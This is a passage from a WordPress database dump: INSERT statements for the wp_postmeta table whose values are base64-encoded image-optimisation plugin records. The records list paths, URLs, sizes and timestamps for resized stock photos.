MDIxMDAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODY0NSwiaWQiOjI1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NDcsImlkIjoyNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NjUwLCJpZCI6MjUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODkwMjEwMC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODkwMjEwMC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODkwMjEwMC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODY1MiwiaWQiOjI1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NTUsImlkIjoyNTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NTcsImlkIjoyNTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NjAsImlkIjoyNTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NjIsImlkIjoyNTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NjUsImlkIjoyNTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NjgsImlkIjoyNTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2NzAsImlkIjoyNTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30283, 252, 'wpfc_optimisation_reduction', '121605'); 
INSERT INTO `wp_postmeta` VALUES (30284, 252, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDIsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTIuanBnIiwicmVkdWN0aW9uIjoxMjE1OTEsInRpbWUiOjE0ODM1ODg2ODEsImlkIjoiMjUyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2ODQsImlkIjoyNTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLTgwMHg1MzQuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4Njg3LCJpZCI6MjUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODY0ODExMi03Njh4NTEzLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODY0ODExMi03Njh4NTEzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODY0ODExMi03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODY5MCwiaWQiOjI1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTYwMHgxMDY4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLTE2MDB4MTA2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODY5NCwiaWQiOjI1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2OTgsImlkIjoyNTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4NjQ4MTEyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NzAwLCJpZCI6MjUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODY0ODExMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODY0ODExMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODY0ODExMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODcwMywiaWQiOjI1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg3MDYsImlkIjoyNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg3MDgsImlkIjoyNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg3MTAsImlkIjoyNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg3MTMsImlkIjoyNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg3MTYsImlkIjoyNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg3MTgsImlkIjoyNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg2NDgxMTItNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg3MjEsImlkIjoyNTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30285, 251, 'wpfc_optimisation_reduction', '138058'); 
INSERT INTO `wp_postmeta` VALUES (30286, 251, 'wpfc_optimisation', 